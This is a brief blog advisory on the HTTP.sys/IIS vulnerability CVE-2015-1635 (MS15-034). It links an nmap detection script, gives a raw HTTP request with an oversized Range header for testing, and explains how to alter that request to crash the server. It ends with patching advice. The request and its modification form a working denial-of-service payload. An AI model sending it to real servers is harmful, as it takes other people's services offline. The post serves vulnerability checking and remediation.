HTTP.sys (IIS) DoS And Remote Code Execution

Description:

Denial of Service (DoS) exploits are widely available to exploit CVE-2015-1635, a vulnerability in HTTP.sys, affecting Internet Information Server (IIS). The patch was released on Tuesday (April 14th) as part of Microsoft's Patch Tuesday.
Due to the ease with which this vulnerability can be exploited, we recommend that you expedite patching this vulnerability.

Risk
Critical
CVSS Score
10.0
CVE


Proof of Concept: 

Method 1:

Download nmap script from the following https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse  Save the file in the script folder (/usr/share/nmap/scripts/) If the server is vulnerable it will show the following.





Method 2:
Send the following request to your IIS server:
GET / HTTP/1.1
Host: MS15034
Range: bytes=0-18446744073709551615
If the server responds with "Requested Header Range Not Satisfiable", then you may be vulnerable


To launch Denial of service DoS attack:
In the example PoC above, change the "0-" to "20-". (has to be smaller then the size of the file retrieved, but larger then 0)
Solutions:
Update windows or Apply windows patches for all the windows servers immediately.
The following screenshot determines that appropriate patch for ms15-034 in installed:





Extra resources:

Refrences:


Comments

Popular posts from this blog

MY OSCP REVIEW

Minishare 1.4.1 Bufferoverflow

Port forwarding and pivoting